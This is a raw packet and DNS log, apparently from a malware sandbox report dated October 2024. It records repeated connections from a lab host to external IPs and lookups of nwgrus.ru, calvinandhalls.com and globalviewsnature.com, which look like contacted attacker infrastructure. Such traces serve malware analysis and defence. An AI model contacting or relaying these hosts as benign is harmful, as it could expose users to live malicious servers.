                                                                                                                            Oct 3, 2024 02:53:33.464452982 CEST49784443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:33.464458942 CEST4434978423.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:33.727922916 CEST4434978423.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:33.728070974 CEST49784443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:33.728077888 CEST4434978423.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:33.728099108 CEST49784443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:33.728137016 CEST4434978423.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:33.728157043 CEST49784443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:33.728171110 CEST4434978423.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:37.245877981 CEST49785443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:37.245978117 CEST4434978523.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:37.246112108 CEST49785443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:37.250405073 CEST49785443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:37.250438929 CEST4434978523.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:37.866208076 CEST4434978523.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:37.866281033 CEST49785443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:37.867599964 CEST49785443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:37.867609024 CEST4434978523.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:37.867947102 CEST4434978523.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:37.931840897 CEST49785443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:37.931904078 CEST49785443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:37.931956053 CEST4434978523.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:38.299240112 CEST4434978523.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:38.299464941 CEST4434978523.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:38.299539089 CEST49785443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:38.308331013 CEST49785443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:38.308370113 CEST4434978523.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:38.308397055 CEST49785443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:53:38.308412075 CEST4434978523.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:54:07.896344900 CEST4978680192.168.2.4190.219.117.240
                                                                                                                            Oct 3, 2024 02:54:07.901741028 CEST8049786190.219.117.240192.168.2.4
                                                                                                                            Oct 3, 2024 02:54:07.901865959 CEST4978680192.168.2.4190.219.117.240
                                                                                                                            Oct 3, 2024 02:54:07.901981115 CEST4978680192.168.2.4190.219.117.240
                                                                                                                            Oct 3, 2024 02:54:07.902046919 CEST4978680192.168.2.4190.219.117.240
                                                                                                                            Oct 3, 2024 02:54:07.907088995 CEST8049786190.219.117.240192.168.2.4
                                                                                                                            Oct 3, 2024 02:54:07.907171965 CEST8049786190.219.117.240192.168.2.4
                                                                                                                            Oct 3, 2024 02:54:09.019166946 CEST8049786190.219.117.240192.168.2.4
                                                                                                                            Oct 3, 2024 02:54:09.019256115 CEST8049786190.219.117.240192.168.2.4
                                                                                                                            Oct 3, 2024 02:54:09.019445896 CEST4978680192.168.2.4190.219.117.240
                                                                                                                            Oct 3, 2024 02:54:09.019547939 CEST4978680192.168.2.4190.219.117.240
                                                                                                                            Oct 3, 2024 02:54:09.024524927 CEST8049786190.219.117.240192.168.2.4
                                                                                                                            Oct 3, 2024 02:54:14.670248985 CEST4978780192.168.2.4190.219.117.240
                                                                                                                            Oct 3, 2024 02:54:14.677112103 CEST8049787190.219.117.240192.168.2.4
                                                                                                                            Oct 3, 2024 02:54:14.677194118 CEST4978780192.168.2.4190.219.117.240
                                                                                                                            Oct 3, 2024 02:54:14.677408934 CEST4978780192.168.2.4190.219.117.240
                                                                                                                            Oct 3, 2024 02:54:14.677423954 CEST4978780192.168.2.4190.219.117.240
                                                                                                                            Oct 3, 2024 02:54:14.682373047 CEST8049787190.219.117.240192.168.2.4
                                                                                                                            Oct 3, 2024 02:54:14.682403088 CEST8049787190.219.117.240192.168.2.4
                                                                                                                            Oct 3, 2024 02:54:15.772309065 CEST8049787190.219.117.240192.168.2.4
                                                                                                                            Oct 3, 2024 02:54:15.778348923 CEST8049787190.219.117.240192.168.2.4
                                                                                                                            Oct 3, 2024 02:54:15.778409004 CEST4978780192.168.2.4190.219.117.240
                                                                                                                            Oct 3, 2024 02:54:15.778502941 CEST4978780192.168.2.4190.219.117.240
                                                                                                                            Oct 3, 2024 02:54:15.783427954 CEST8049787190.219.117.240192.168.2.4
                                                                                                                            Oct 3, 2024 02:54:23.074740887 CEST4978880192.168.2.4190.219.117.240
                                                                                                                            Oct 3, 2024 02:54:23.079809904 CEST8049788190.219.117.240192.168.2.4
                                                                                                                            Oct 3, 2024 02:54:23.080022097 CEST4978880192.168.2.4190.219.117.240
                                                                                                                            Oct 3, 2024 02:54:23.080152035 CEST4978880192.168.2.4190.219.117.240
                                                                                                                            Oct 3, 2024 02:54:23.080184937 CEST4978880192.168.2.4190.219.117.240
                                                                                                                            Oct 3, 2024 02:54:23.085079908 CEST8049788190.219.117.240192.168.2.4
                                                                                                                            Oct 3, 2024 02:54:23.085108995 CEST8049788190.219.117.240192.168.2.4
                                                                                                                            Oct 3, 2024 02:54:24.173683882 CEST8049788190.219.117.240192.168.2.4
                                                                                                                            Oct 3, 2024 02:54:24.178646088 CEST8049788190.219.117.240192.168.2.4
                                                                                                                            Oct 3, 2024 02:54:24.178713083 CEST4978880192.168.2.4190.219.117.240
                                                                                                                            Oct 3, 2024 02:54:24.178752899 CEST4978880192.168.2.4190.219.117.240
                                                                                                                            Oct 3, 2024 02:54:24.183702946 CEST8049788190.219.117.240192.168.2.4
                                                                                                                            Oct 3, 2024 02:54:30.636445045 CEST4978980192.168.2.4190.219.117.240
                                                                                                                            Oct 3, 2024 02:54:30.642077923 CEST8049789190.219.117.240192.168.2.4
                                                                                                                            Oct 3, 2024 02:54:30.642164946 CEST4978980192.168.2.4190.219.117.240
                                                                                                                            Oct 3, 2024 02:54:30.642303944 CEST4978980192.168.2.4190.219.117.240
                                                                                                                            Oct 3, 2024 02:54:30.642373085 CEST4978980192.168.2.4190.219.117.240
                                                                                                                            Oct 3, 2024 02:54:30.647489071 CEST8049789190.219.117.240192.168.2.4
                                                                                                                            Oct 3, 2024 02:54:30.647531033 CEST8049789190.219.117.240192.168.2.4
                                                                                                                            Oct 3, 2024 02:54:31.822818995 CEST8049789190.219.117.240192.168.2.4
                                                                                                                            Oct 3, 2024 02:54:31.831110001 CEST8049789190.219.117.240192.168.2.4
                                                                                                                            Oct 3, 2024 02:54:31.831285000 CEST4978980192.168.2.4190.219.117.240
                                                                                                                            Oct 3, 2024 02:54:31.831285000 CEST4978980192.168.2.4190.219.117.240
                                                                                                                            Oct 3, 2024 02:54:31.836261034 CEST8049789190.219.117.240192.168.2.4
                                                                                                                            Oct 3, 2024 02:54:40.340740919 CEST4979080192.168.2.4190.219.117.240
                                                                                                                            Oct 3, 2024 02:54:40.345947981 CEST8049790190.219.117.240192.168.2.4
                                                                                                                            Oct 3, 2024 02:54:40.346025944 CEST4979080192.168.2.4190.219.117.240
                                                                                                                            Oct 3, 2024 02:54:40.346215963 CEST4979080192.168.2.4190.219.117.240
                                                                                                                            Oct 3, 2024 02:54:40.346232891 CEST4979080192.168.2.4190.219.117.240
                                                                                                                            Oct 3, 2024 02:54:40.351094007 CEST8049790190.219.117.240192.168.2.4
                                                                                                                            Oct 3, 2024 02:54:40.351198912 CEST8049790190.219.117.240192.168.2.4
                                                                                                                            Oct 3, 2024 02:54:41.494410038 CEST8049790190.219.117.240192.168.2.4
                                                                                                                            Oct 3, 2024 02:54:41.494504929 CEST8049790190.219.117.240192.168.2.4
                                                                                                                            Oct 3, 2024 02:54:41.494534969 CEST8049790190.219.117.240192.168.2.4
                                                                                                                            Oct 3, 2024 02:54:41.494606972 CEST4979080192.168.2.4190.219.117.240
                                                                                                                            Oct 3, 2024 02:54:41.494607925 CEST4979080192.168.2.4190.219.117.240
                                                                                                                            Oct 3, 2024 02:54:41.494780064 CEST4979080192.168.2.4190.219.117.240
                                                                                                                            Oct 3, 2024 02:54:41.499623060 CEST8049790190.219.117.240192.168.2.4
                                                                                                                            Oct 3, 2024 02:54:52.854710102 CEST49791443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:54:52.854805946 CEST4434979123.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:54:52.854897022 CEST49791443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:54:52.855295897 CEST49791443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:54:52.855381012 CEST4434979123.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:54:53.493346930 CEST4434979123.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:54:53.493561029 CEST49791443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:54:53.494704008 CEST49791443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:54:53.494760990 CEST4434979123.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:54:53.495114088 CEST4434979123.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:54:53.531335115 CEST49791443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:54:53.531335115 CEST49791443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:54:53.531548023 CEST4434979123.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:54:53.771467924 CEST4434979123.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:54:53.771548986 CEST4434979123.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:54:53.771742105 CEST49791443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:54:53.771897078 CEST49791443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:54:53.771944046 CEST4434979123.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:54:53.771981001 CEST49791443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:54:53.771996975 CEST4434979123.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:54:55.344008923 CEST4979280192.168.2.4201.212.52.197
                                                                                                                            Oct 3, 2024 02:54:55.349196911 CEST8049792201.212.52.197192.168.2.4
                                                                                                                            Oct 3, 2024 02:54:55.349271059 CEST4979280192.168.2.4201.212.52.197
                                                                                                                            Oct 3, 2024 02:54:55.349387884 CEST4979280192.168.2.4201.212.52.197
                                                                                                                            Oct 3, 2024 02:54:55.349399090 CEST4979280192.168.2.4201.212.52.197
                                                                                                                            Oct 3, 2024 02:54:55.354331017 CEST8049792201.212.52.197192.168.2.4
                                                                                                                            Oct 3, 2024 02:54:55.354370117 CEST8049792201.212.52.197192.168.2.4
                                                                                                                            Oct 3, 2024 02:54:56.653625011 CEST8049792201.212.52.197192.168.2.4
                                                                                                                            Oct 3, 2024 02:54:56.654210091 CEST8049792201.212.52.197192.168.2.4
                                                                                                                            Oct 3, 2024 02:54:56.654274940 CEST4979280192.168.2.4201.212.52.197
                                                                                                                            Oct 3, 2024 02:54:56.654320955 CEST4979280192.168.2.4201.212.52.197
                                                                                                                            Oct 3, 2024 02:54:56.659790993 CEST8049792201.212.52.197192.168.2.4
                                                                                                                            Oct 3, 2024 02:55:09.034935951 CEST49793443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:55:09.035032988 CEST4434979323.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:55:09.035165071 CEST49793443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:55:09.035455942 CEST49793443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:55:09.035490990 CEST4434979323.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:55:09.644175053 CEST4434979323.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:55:09.644258976 CEST49793443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:55:09.645886898 CEST49793443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:55:09.645915985 CEST4434979323.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:55:09.646188021 CEST4434979323.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:55:09.646919966 CEST49793443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:55:09.646959066 CEST49793443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:55:09.646995068 CEST4434979323.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:55:09.932590008 CEST4434979323.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:55:09.932645082 CEST4434979323.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:55:09.932817936 CEST49793443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:55:09.932919979 CEST49793443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:55:09.932919979 CEST49793443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:55:09.932969093 CEST4434979323.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:55:09.933007956 CEST4434979323.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:55:12.851555109 CEST4979480192.168.2.4201.212.52.197
                                                                                                                            Oct 3, 2024 02:55:12.856806993 CEST8049794201.212.52.197192.168.2.4
                                                                                                                            Oct 3, 2024 02:55:12.856915951 CEST4979480192.168.2.4201.212.52.197
                                                                                                                            Oct 3, 2024 02:55:12.858268023 CEST4979480192.168.2.4201.212.52.197
                                                                                                                            Oct 3, 2024 02:55:12.858299971 CEST4979480192.168.2.4201.212.52.197
                                                                                                                            Oct 3, 2024 02:55:12.863435030 CEST8049794201.212.52.197192.168.2.4
                                                                                                                            Oct 3, 2024 02:55:12.863454103 CEST8049794201.212.52.197192.168.2.4
                                                                                                                            Oct 3, 2024 02:55:14.179193020 CEST8049794201.212.52.197192.168.2.4
                                                                                                                            Oct 3, 2024 02:55:14.179409027 CEST8049794201.212.52.197192.168.2.4
                                                                                                                            Oct 3, 2024 02:55:14.179610014 CEST4979480192.168.2.4201.212.52.197
                                                                                                                            Oct 3, 2024 02:55:14.179610014 CEST4979480192.168.2.4201.212.52.197
                                                                                                                            Oct 3, 2024 02:55:14.184751987 CEST8049794201.212.52.197192.168.2.4
                                                                                                                            Oct 3, 2024 02:55:26.356240034 CEST49795443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:55:26.356271982 CEST4434979523.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:55:26.356347084 CEST49795443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:55:26.356664896 CEST49795443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:55:26.356673956 CEST4434979523.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:55:27.271159887 CEST4434979523.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:55:27.271316051 CEST49795443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:55:27.276454926 CEST49795443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:55:27.276473999 CEST4434979523.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:55:27.276810884 CEST4434979523.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:55:27.283245087 CEST49795443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:55:27.283245087 CEST49795443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:55:27.283343077 CEST4434979523.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:55:27.953202963 CEST4434979523.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:55:27.953290939 CEST4434979523.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:55:27.953344107 CEST49795443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:55:27.953500986 CEST49795443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:55:27.953519106 CEST4434979523.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:55:27.953528881 CEST49795443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:55:27.953533888 CEST4434979523.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:55:30.051381111 CEST4979680192.168.2.4201.212.52.197
                                                                                                                            Oct 3, 2024 02:55:30.056699038 CEST8049796201.212.52.197192.168.2.4
                                                                                                                            Oct 3, 2024 02:55:30.056873083 CEST4979680192.168.2.4201.212.52.197
                                                                                                                            Oct 3, 2024 02:55:30.057107925 CEST4979680192.168.2.4201.212.52.197
                                                                                                                            Oct 3, 2024 02:55:30.057107925 CEST4979680192.168.2.4201.212.52.197
                                                                                                                            Oct 3, 2024 02:55:30.062050104 CEST8049796201.212.52.197192.168.2.4
                                                                                                                            Oct 3, 2024 02:55:30.062163115 CEST8049796201.212.52.197192.168.2.4
                                                                                                                            Oct 3, 2024 02:55:31.392007113 CEST8049796201.212.52.197192.168.2.4
                                                                                                                            Oct 3, 2024 02:55:31.392054081 CEST8049796201.212.52.197192.168.2.4
                                                                                                                            Oct 3, 2024 02:55:31.392173052 CEST4979680192.168.2.4201.212.52.197
                                                                                                                            Oct 3, 2024 02:55:31.392462015 CEST4979680192.168.2.4201.212.52.197
                                                                                                                            Oct 3, 2024 02:55:31.398541927 CEST8049796201.212.52.197192.168.2.4
                                                                                                                            Oct 3, 2024 02:55:43.353779078 CEST49797443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:55:43.353904009 CEST4434979723.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:55:43.354001045 CEST49797443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:55:43.354336977 CEST49797443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:55:43.354365110 CEST4434979723.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:55:43.983452082 CEST4434979723.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:55:43.983580112 CEST49797443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:55:44.006414890 CEST49797443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:55:44.006465912 CEST4434979723.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:55:44.006824017 CEST4434979723.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:55:44.012696981 CEST49797443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:55:44.012734890 CEST49797443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:55:44.012819052 CEST4434979723.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:55:44.353369951 CEST4434979723.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:55:44.353426933 CEST4434979723.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:55:44.353496075 CEST49797443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:55:44.353712082 CEST49797443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:55:44.353754997 CEST4434979723.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:55:44.353781939 CEST49797443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:55:44.353796005 CEST4434979723.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:55:47.172106981 CEST4979880192.168.2.4201.212.52.197
                                                                                                                            Oct 3, 2024 02:55:47.915085077 CEST8049798201.212.52.197192.168.2.4
                                                                                                                            Oct 3, 2024 02:55:47.915186882 CEST4979880192.168.2.4201.212.52.197
                                                                                                                            Oct 3, 2024 02:55:47.915378094 CEST4979880192.168.2.4201.212.52.197
                                                                                                                            Oct 3, 2024 02:55:47.915433884 CEST4979880192.168.2.4201.212.52.197
                                                                                                                            Oct 3, 2024 02:55:47.920412064 CEST8049798201.212.52.197192.168.2.4
                                                                                                                            Oct 3, 2024 02:55:47.920444012 CEST8049798201.212.52.197192.168.2.4
                                                                                                                            Oct 3, 2024 02:55:49.226342916 CEST8049798201.212.52.197192.168.2.4
                                                                                                                            Oct 3, 2024 02:55:49.226388931 CEST8049798201.212.52.197192.168.2.4
                                                                                                                            Oct 3, 2024 02:55:49.226473093 CEST4979880192.168.2.4201.212.52.197
                                                                                                                            Oct 3, 2024 02:55:49.226640940 CEST4979880192.168.2.4201.212.52.197
                                                                                                                            Oct 3, 2024 02:55:49.231765032 CEST8049798201.212.52.197192.168.2.4
                                                                                                                            Oct 3, 2024 02:55:59.984632969 CEST49799443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:55:59.984719992 CEST4434979923.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:55:59.984819889 CEST49799443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:55:59.985107899 CEST49799443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:55:59.985150099 CEST4434979923.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:56:00.585305929 CEST4434979923.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:56:00.585515976 CEST49799443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:56:00.588429928 CEST49799443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:56:00.588485003 CEST4434979923.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:56:00.588854074 CEST4434979923.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:56:00.600989103 CEST49799443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:56:00.600989103 CEST49799443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:56:00.601208925 CEST4434979923.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:56:00.871871948 CEST4434979923.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:56:00.872009039 CEST4434979923.145.40.162192.168.2.4
                                                                                                                            Oct 3, 2024 02:56:00.872313023 CEST49799443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:56:00.872313976 CEST49799443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:56:00.872313976 CEST49799443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:56:01.273555040 CEST49799443192.168.2.423.145.40.162
                                                                                                                            Oct 3, 2024 02:56:01.273616076 CEST4434979923.145.40.162192.168.2.4
                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                            Oct 3, 2024 02:52:22.342329979 CEST5611453192.168.2.41.1.1.1
                                                                                                                            Oct 3, 2024 02:52:22.475574017 CEST53561141.1.1.1192.168.2.4
                                                                                                                            Oct 3, 2024 02:53:16.678008080 CEST6485253192.168.2.41.1.1.1
                                                                                                                            Oct 3, 2024 02:53:16.711724043 CEST53648521.1.1.1192.168.2.4
                                                                                                                            Oct 3, 2024 02:54:53.081018925 CEST5486653192.168.2.41.1.1.1
                                                                                                                            Oct 3, 2024 02:54:54.089508057 CEST5486653192.168.2.41.1.1.1
                                                                                                                            Oct 3, 2024 02:54:55.153078079 CEST5486653192.168.2.41.1.1.1
                                                                                                                            Oct 3, 2024 02:54:55.331182003 CEST53548661.1.1.1192.168.2.4
                                                                                                                            Oct 3, 2024 02:54:55.331223965 CEST53548661.1.1.1192.168.2.4
                                                                                                                            Oct 3, 2024 02:54:55.331253052 CEST53548661.1.1.1192.168.2.4
                                                                                                                            Oct 3, 2024 02:56:06.478717089 CEST6420253192.168.2.41.1.1.1
                                                                                                                            Oct 3, 2024 02:56:06.504838943 CEST53642021.1.1.1192.168.2.4
                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                            Oct 3, 2024 02:52:22.342329979 CEST192.168.2.41.1.1.10x7ceeStandard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                                                                                                            Oct 3, 2024 02:53:16.678008080 CEST192.168.2.41.1.1.10x529cStandard query (0)calvinandhalls.comA (IP address)IN (0x0001)false
                                                                                                                            Oct 3, 2024 02:54:53.081018925 CEST192.168.2.41.1.1.10xeb2fStandard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                                                                                                            Oct 3, 2024 02:54:54.089508057 CEST192.168.2.41.1.1.10xeb2fStandard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                                                                                                            Oct 3, 2024 02:54:55.153078079 CEST192.168.2.41.1.1.10xeb2fStandard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                                                                                                            Oct 3, 2024 02:56:06.478717089 CEST192.168.2.41.1.1.10x4823Standard query (0)globalviewsnature.comA (IP address)IN (0x0001)false
                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                            Oct 3, 2024 02:52:15.731432915 CEST1.1.1.1192.168.2.40x3cd4No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                            Oct 3, 2024 02:52:15.731432915 CEST1.1.1.1192.168.2.40x3cd4No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                            Oct 3, 2024 02:52:17.043941021 CEST1.1.1.1192.168.2.40x857No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                            Oct 3, 2024 02:52:17.043941021 CEST1.1.1.1192.168.2.40x857No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                                            Oct 3, 2024 02:52:22.475574017 CEST1.1.1.1192.168.2.40x7ceeNo error (0)nwgrus.ru190.219.117.240A (IP address)IN (0x0001)false
                                                                                                                            Oct 3, 2024 02:52:22.475574017 CEST1.1.1.1192.168.2.40x7ceeNo error (0)nwgrus.ru211.171.233.126A (IP address)IN (0x0001)false
                                                                                                                            Oct 3, 2024 02:52:22.475574017 CEST1.1.1.1192.168.2.40x7ceeNo error (0)nwgrus.ru201.212.52.197A (IP address)IN (0x0001)false
                                                                                                                            Oct 3, 2024 02:52:22.475574017 CEST1.1.1.1192.168.2.40x7ceeNo error (0)nwgrus.ru187.199.200.127A (IP address)IN (0x0001)false
                                                                                                                            Oct 3, 2024 02:52:22.475574017 CEST1.1.1.1192.168.2.40x7ceeNo error (0)nwgrus.ru220.125.3.190A (IP address)IN (0x0001)false
                                                                                                                            Oct 3, 2024 02:52:22.475574017 CEST1.1.1.1192.168.2.40x7ceeNo error (0)nwgrus.ru200.63.106.141A (IP address)IN (0x0001)false
                                                                                                                            Oct 3, 2024 02:52:22.475574017 CEST1.1.1.1192.168.2.40x7ceeNo error (0)nwgrus.ru197.164.156.210A (IP address)IN (0x0001)false
                                                                                                                            Oct 3, 2024 02:52:22.475574017 CEST1.1.1.1192.168.2.40x7ceeNo error (0)nwgrus.ru105.197.97.247A (IP address)IN (0x0001)false
                                                                                                                            Oct 3, 2024 02:52:22.475574017 CEST1.1.1.1192.168.2.40x7ceeNo error (0)nwgrus.ru187.131.253.169A (IP address)IN (0x0001)false
                                                                                                                            Oct 3, 2024 02:52:22.475574017 CEST1.1.1.1192.168.2.40x7ceeNo error (0)nwgrus.ru46.100.50.5A (IP address)IN (0x0001)false
                                                                                                                            Oct 3, 2024 02:53:16.711724043 CEST1.1.1.1192.168.2.40x529cNo error (0)calvinandhalls.com23.145.40.162A (IP address)IN (0x0001)false
                                                                                                                            Oct 3, 2024 02:54:55.331182003 CEST1.1.1.1192.168.2.40xeb2fNo error (0)nwgrus.ru201.212.52.197A (IP address)IN (0x0001)false
                                                                                                                            Oct 3, 2024 02:54:55.331182003 CEST1.1.1.1192.168.2.40xeb2fNo error (0)nwgrus.ru46.100.50.5A (IP address)IN (0x0001)false
                                                                                                                            Oct 3, 2024 02:54:55.331182003 CEST1.1.1.1192.168.2.40xeb2fNo error (0)nwgrus.ru189.61.54.32A (IP address)IN (0x0001)false
                                                                                                                            Oct 3, 2024 02:54:55.331182003 CEST1.1.1.1192.168.2.40xeb2fNo error (0)nwgrus.ru93.118.137.82A (IP address)IN (0x0001)false
                                                                                                                            Oct 3, 2024 02:54:55.331182003 CEST1.1.1.1192.168.2.40xeb2fNo error (0)nwgrus.ru211.171.233.126A (IP address)IN (0x0001)false
                                                                                                                            Oct 3, 2024 02:54:55.331182003 CEST1.1.1.1192.168.2.40xeb2fNo error (0)nwgrus.ru213.172.74.157A (IP address)IN (0x0001)false
                                                                                                                            Oct 3, 2024 02:54:55.331182003 CEST1.1.1.1192.168.2.40xeb2fNo error (0)nwgrus.ru211.171.233.129A (IP address)IN (0x0001)false
                                                                                                                            Oct 3, 2024 02:54:55.331182003 CEST1.1.1.1192.168.2.40xeb2fNo error (0)nwgrus.ru181.123.219.23A (IP address)IN (0x0001)false
                                                                                                                            Oct 3, 2024 02:54:55.331182003 CEST1.1.1.1192.168.2.40xeb2fNo error (0)nwgrus.ru187.131.253.169A (IP address)IN (0x0001)false
